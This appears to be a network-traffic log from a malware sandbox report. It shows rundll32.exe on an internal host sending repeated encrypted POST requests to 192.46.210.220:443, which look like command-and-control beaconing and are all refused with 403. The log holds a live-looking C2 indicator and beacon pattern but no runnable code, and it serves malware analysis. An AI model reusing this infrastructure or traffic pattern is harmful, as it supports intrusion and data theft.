2021-10-28 02:46:28 UTC | 213 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:28 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 42
Source IP: 192.168.2.5    Source Port: 49941    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:28 UTC | 208 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:28 UTC | 213 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:28 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID: 43
Source IP: 192.168.2.5    Source Port: 49963    Destination IP: 192.46.210.220    Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:46:31 UTC | 213 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:46:32 UTC | 223 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:46:32 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
44          192.168.2.5  49964        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:31 UTC  218                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:31 UTC  218                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:32 UTC  223                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:32 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
45          192.168.2.5  49974        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:35 UTC  223                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:35 UTC  223                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:36 UTC  233                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:36 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
46          192.168.2.5  49975        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:35 UTC  228                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:35 UTC  228                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:36 UTC  233                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:36 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
47          192.168.2.5  49982        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:39 UTC  233                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:39 UTC  233                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:40 UTC  243                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:40 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
48          192.168.2.5  49983        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:39 UTC  238                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:39 UTC  238                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:40 UTC  243                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:40 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
49          192.168.2.5  49990        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:44 UTC  243                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:44 UTC  243                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:44 UTC  253                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:44 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
5           192.168.2.5  49776        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:45:15 UTC  24                  OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:45:15 UTC  24                  OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:45:16 UTC  34                  IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:45:16 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
50          192.168.2.5  49991        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:44 UTC  248                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:44 UTC  248                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:44 UTC  253                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:44 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
51          192.168.2.5  49998        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:47 UTC  253                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:47 UTC  253                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:48 UTC  263                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:48 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
52          192.168.2.5  49999        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:48 UTC  258                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4844
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:48 UTC  258                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:48 UTC  263                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:48 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
53          192.168.2.5  50006        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:46:51 UTC  263                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4832
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:46:51 UTC  263                 OUT        Data Raw: [hex dump of the request body and its ASCII rendering omitted]
2021-10-28 02:46:52 UTC  273                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:46:52 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
54         | 192.168.2.5 | 50007       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:46:52 UTC | 268                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:46:52 UTC | 273                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:46:52 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
55         | 192.168.2.5 | 50014       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:46:55 UTC | 273                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:46:56 UTC | 283                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:46:56 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
56         | 192.168.2.5 | 50015       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:46:56 UTC | 278                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:46:56 UTC | 283                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:46:56 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
57         | 192.168.2.5 | 50022       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:46:59 UTC | 283                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:47:00 UTC | 293                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:47:00 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
58         | 192.168.2.5 | 50023       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:46:59 UTC | 288                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:47:00 UTC | 293                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:47:00 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
59         | 192.168.2.5 | 50030       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:47:03 UTC | 293                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:47:04 UTC | 302                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:47:04 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
6          | 192.168.2.5 | 49777       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:45:15 UTC | 29                 | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:45:16 UTC | 34                 | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:45:16 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
60         | 192.168.2.5 | 50031       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:47:03 UTC | 298                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:47:04 UTC | 303                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:47:04 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
61         | 192.168.2.5 | 50038       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:47:07 UTC | 303                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:47:08 UTC | 312                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:47:08 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
62         | 192.168.2.5 | 50039       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:47:07 UTC | 308                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4832
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
2021-10-28 02:47:08 UTC | 313                | IN        | HTTP/1.1 403 Forbidden
                        |                    |           | Server: nginx/1.15.12
                        |                    |           | Date: Thu, 28 Oct 2021 02:47:08 GMT
                        |                    |           | Content-Type: text/plain; charset=utf-8
                        |                    |           | Connection: close


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
63         | 192.168.2.5 | 50046       | 192.46.210.220 | 443              | C:\Windows\SysWOW64\rundll32.exe

Timestamp               | kBytes transferred | Direction | Data
2021-10-28 02:47:11 UTC | 313                | OUT       | POST / HTTP/1.1
                        |                    |           | Host: 192.46.210.220
                        |                    |           | Content-Length: 4844
                        |                    |           | Connection: Close
                        |                    |           | Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:12 UTC322INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
64 | 192.168.2.5 | 50047 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:11 UTC | 318 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:11 UTC | 318 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:12 UTC | 323 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:12 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
65 | 192.168.2.5 | 50054 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:15 UTC | 323 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:15 UTC | 323 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:16 UTC | 328 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:16 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
66 | 192.168.2.5 | 50055 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:16 UTC | 328 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:16 UTC | 328 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:17 UTC | 332 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:17 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
67 | 192.168.2.5 | 50063 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:20 UTC | 333 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:20 UTC | 333 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:20 UTC | 342 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
68 | 192.168.2.5 | 50064 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:20 UTC | 337 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:20 UTC | 338 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:21 UTC | 342 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
69 | 192.168.2.5 | 50074 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:24 UTC | 343 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:24 UTC | 343 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:24 UTC | 347 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49784 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:20 UTC | 34 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:45:20 UTC | 34 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:45:21 UTC | 44 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
70 | 192.168.2.5 | 50079 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:26 UTC | 348 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:26 UTC | 348 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:27 UTC | 352 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:26 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
71 | 192.168.2.5 | 50085 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:28 UTC | 352 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:28 UTC | 353 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:28 UTC | 357 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:28 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
72 | 192.168.2.5 | 50090 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:30 UTC | 357 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:30 UTC | 358 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:30 UTC | 362 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:30 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
73 | 192.168.2.5 | 50094 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:31 UTC | 362 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:47:31 UTC | 363 | OUT | Data Raw: (hex dump of request body omitted)
2021-10-28 02:47:32 UTC | 367 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:32 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
74 | 192.168.2.5 | 50098 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:34 UTC | 367 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:47:34 UTC | 368 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:34 UTC | 372 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:34 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
75 | 192.168.2.5 | 50102 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:35 UTC | 372 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:47:35 UTC | 372 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:36 UTC | 377 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:36 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
76 | 192.168.2.5 | 50106 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:38 UTC | 377 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
